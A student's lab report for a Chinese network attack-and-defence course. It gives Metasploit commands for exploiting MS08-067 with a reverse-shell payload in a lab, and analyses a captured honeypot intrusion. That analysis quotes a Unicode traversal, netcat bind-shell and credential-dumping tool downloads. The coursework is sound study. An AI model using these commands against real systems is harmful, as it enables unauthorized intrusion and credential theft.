20252907 2025-2026-2 《网络攻防实践》第六周作业
20252907 2025-2026-2 《网络攻防实践》第六周作业
1.实践内容
实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实践过程
2.1 动手实践Metasploit windows attacker
启动靶机win2k和攻击机kali,查看到靶机ip地址为192.168.200.9,攻击机ip地址为192.168.200.7,测试二者之间的连通性正常


测试二者之间的连通性正常

在kali中输入命令msfconsole启动工具

输入命令search ms08_067查看漏洞ms08_067的详细信息

输入命令exploit/windows/smb/ms08_067_netapi,然后输入命令show payloads显示可攻击载荷

输入命令show options查看攻击漏洞信息

输入命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接,然后输入命令set LHOST 192.168.200.7设置渗透攻击的主机是kali,输入命令set RHOST 192.168.200.9设置渗透攻击的靶机Win2k

输入命令show options查看当前参数列表及其默认装置

输入命令exploit开始渗透攻击,成功渗透到靶机win2k,输入命令ipconfig查看靶机的网络信息成功

2.2取证分析实践:解码一次成功的NT系统破解攻击
将学习通上下载的文件拷贝到kali虚拟机中

使用wireshark打开刚刚拷贝的文件

使用过滤条件ip.addr == 172.16.1.106 and http过滤数据

找到117行的http数据包,根据数据包中的内容,特殊字符串%C0%AF是/的unicode编码,由此判断攻击者进行了unicode攻击并打开了boot.in文件

继续追踪tcp流发现在146号包中有shell语句和"ADM!ROX!YOUR!WORLD"!,查阅资料知道这是RDS漏洞攻击

追踪数据流,这里表明攻击者利用ftp下载了nc.exe,pdump.exe,samdump.dll这三个文件

打开1233号包,追踪TCP数据流看到cmd1.exe /c nc -l -p 6969 -e cmd1.exe,这表明攻击者连接了6969端口,接下来可以添加条件重点追踪涉及6969端口的TCP流,看看攻击者干了什么

输入过滤条件tcp.port == 6969,追踪数据流可以发现攻击机试图进入靶机但是失败

这里表明攻击者删除了之前通过ftp下载的文件,猜测攻击者想要消除痕迹然后溜走

这里表明攻击者发现了靶机是一台蜜罐主机,并表示echo best honeypot

2.3团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
攻击机kali ip地址:172.20.10.4(赵一旭)
靶机Win2k ip地址: 172.20.10.5 (梁永超)
按照任务一步骤,攻击靶机

键入如下图命令


可以看到目标机器出现我创建的文件夹。

分析追踪流

3.学习中遇到的问题及解决
-
问题1:kali虚拟机与win2k靶机无法连通
-
问题1解决方案:发现win2k虚拟机是无法连接网络
将win2k连接到Vmnet8,并设置Internet协议(TCP/IP)属性从使用下面IP地址变为自动获取ip地址。
4.实践总结
通过本次系列实验,我对渗透测试框架 Metasploit 形成了系统性的认知与实操能力。本次实验以 Windows 操作系统安全攻防为核心,围绕 Metasploit 远程渗透攻击、NT 系统攻击流量取证分析、攻防团队对抗三大实践任务开展学习,完成了从漏洞利用理论知识到攻防实操落地的完整闭环,彻底打破了以往对 Windows 系统 “默认安全” 的固有认知,对系统漏洞的潜在危害、攻击链路的复杂构成以及攻防一体化的安全防护理念,建立起更加直观且深刻的理解。
Metasploit 作为业内主流的渗透测试工具,集成了大量成熟的漏洞利用模块。借助框架实操,我深入掌握了 MS08-067 漏洞的攻击原理与利用流程,切实感受到自动化渗透测试工具在攻防演练中的核心作用;流量取证分析环节中,我熟练掌握了网络流量溯源、攻击行为还原的关键方法,能够通过解析数据包提取攻击特征,完整还原整体攻击链路;而团队攻防对抗环节,高度模拟了真实网络攻防场景,让我切换攻防双视角看待网络安全博弈,清晰认识到攻击与防御的制衡关系,深刻体会到知己知彼、综合防御在网络安全防护中的重要意义。
本次实验与我而言仅是系统安全攻防学习的开端。后续我将以此为基础,持续深耕网络安全领域,在夯实基础漏洞利用能力的前提下,逐步拓展内网渗透、APT 攻击检测等进阶技术的学习与研究,严守网络安全法律法规,将所学攻防知识合理运用于合规的安全检测与防护工作中,不断提升自身网络安全综合实践能力。

浙公网安备 33010602011771号